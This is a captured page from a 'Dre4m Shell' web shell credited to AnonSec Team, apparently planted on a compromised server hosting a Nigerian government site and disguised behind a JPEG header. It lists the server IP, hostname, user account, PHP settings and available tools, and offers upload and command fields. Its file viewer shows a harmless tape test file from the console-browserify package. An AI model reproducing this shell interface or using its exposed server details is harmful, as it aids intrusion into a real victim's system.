ÿØÿàJFIFÿáExifMM*ÿÛC  Dre4m Was Here
Dre4m Shell
Server IP : 199.250.214.225  /  Your IP : 18.227.81.250
Web Server : Apache
System : Linux vps64074.inmotionhosting.com 3.10.0-1160.105.1.vz7.214.3 #1 SMP Tue Jan 9 19:45:01 MSK 2024 x86_64
User : nicngo5 ( 1001)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : OFF
Directory :  /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/node_modules/console-browserify/test/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /home/nicngo5/funds.upgrade.nicn.gov.ng/funds-upgraded/node_modules/console-browserify/test/index.js
var console = require("../index")
var test = require("tape")

if (typeof window !== "undefined" && !window.JSON) {
    window.JSON = require("jsonify")
}

test("console has expected methods", function (assert) {
    assert.ok(console.log)
    assert.ok(console.info)
    assert.ok(console.warn)
    assert.ok(console.dir)
    assert.ok(console.time, "time")
    assert.ok(console.timeEnd, "timeEnd")
    assert.ok(console.trace, "trace")
    assert.ok(console.assert)

    assert.end()
})

test("invoke console.log", function (assert) {
    console.log("test-log")

    assert.end()
})

test("invoke console.info", function (assert) {
    console.info("test-info")

    assert.end()
})

test("invoke console.warn", function (assert) {
    console.warn("test-warn")
    
    assert.end()
})

test("invoke console.time", function (assert) {
    console.time("label")

    assert.end()
})

test("invoke console.trace", function (assert) {
    console.trace("test-trace")

    assert.end()
})

test("invoke console.assert", function (assert) {
    console.assert(true)

    assert.end()
})

test("invoke console.dir", function (assert) {
    console.dir("test-dir")

    assert.end()
})

test("invoke console.timeEnd", function (assert) {
    console.timeEnd("label")

    assert.end()
})

Anon7 - 2022
AnonSec Team